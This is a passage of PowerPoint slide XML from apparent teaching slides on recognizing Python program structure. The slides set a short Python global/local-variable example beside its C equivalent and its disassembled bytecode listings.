              <a:rPr i="1" lang="en-GB"/>
              <a:t>array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>structs</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>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99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="1124744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FBD4B4"/>
          </a:solid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GB"/>
              <a:t>Recognizing Python structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1002" name="Google Shape;1002;p99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="1196752"/>
            <a:ext cx="8784976"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000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Local &amp; global variables</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003" name="Google Shape;1003;p99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251521" y="1844824"/>
            <a:ext cx="2592288" cy="2308324"/>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x = 1</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y = 2</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def main():</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global x</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x = x + y</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    print ("Total = ", x)</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main()</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1004" name="Google Shape;1004;p99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="4151366"/>
            <a:ext cx="2592289" cy="2308324"/>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def main():</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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en-GB" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>int x = 1;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en-GB" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>int y = 2;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>x = x+y;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>printf("Total = %d\n", x);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1005" name="Google Shape;1005;p99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3017822" y="1159597"/>
            <a:ext cx="3024336" cy="5632311"/>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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> 1           0 LOAD_CONST               0 (1)</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2 STORE_GLOBAL             0 (x)</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2           4 LOAD_CONST               1 (2)</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6 STORE_NAME               1 (y)</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4           8 LOAD_CONST               2</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10 LOAD_CONST               3 ('main')</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12 MAKE_FUNCTION            0</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14 STORE_NAME               2 (main)</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8          16 LOAD_NAME                2 (main)</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18 CALL_FUNCTION            0</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20 POP_TOP</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22 LOAD_CONST               4 (None)</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24 RETURN_VALUE</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6           0 LOAD_GLOBAL              0 (x)</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2 LOAD_GLOBAL              1 (y)</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4 BINARY_ADD</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6 STORE_GLOBAL             0 (x)</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7           8 LOAD_GLOBAL              2 (print)</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10 LOAD_CONST               1 ('Total = ')</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12 LOAD_GLOBAL              0 (x)</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14 CALL_FUNCTION            2</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16 POP_TOP</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18 LOAD_CONST               0 (None)</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20 RETURN_VALUE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1006" name="Google Shape;1006;p99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6047656" y="1200515"/>
            <a:ext cx="3096344" cy="5632311"/>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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> 1           0 LOAD_CONST               0 </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2 LOAD_CONST               1 ('main')</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4 MAKE_FUNCTION            0</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6 STORE_NAME               0 (main)</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6           8 LOAD_NAME                0 (main)</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10 CALL_FUNCTION            0</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12 POP_TOP</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14 LOAD_CONST               2 (None)</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16 RETURN_VALUE</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2           0 LOAD_CONST               1 (1)</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2 STORE_FAST               0 (x)</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3           4 LOAD_CONST               1 (1)</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6 STORE_FAST               1 (y)</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4           8 LOAD_FAST                0 (x)</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10 LOAD_FAST                1 (y)</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12 BINARY_ADD</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14 STORE_FAST               0 (x)</a:t>
            </a:r>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5          16 LOAD_GLOBAL              0 (print)</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18 LOAD_CONST               2 ('Total = ')</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20 LOAD_FAST                0 (x)</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22 CALL_FUNCTION            2</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24 POP_TOP</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26 LOAD_CONST               0 (None)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>             28 RETURN_VALUE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2017-06-08T06:53:33Z</dcterms:created>
  <dc:creator>TTS</dc:creator>
</cp:coreProperties>
</file>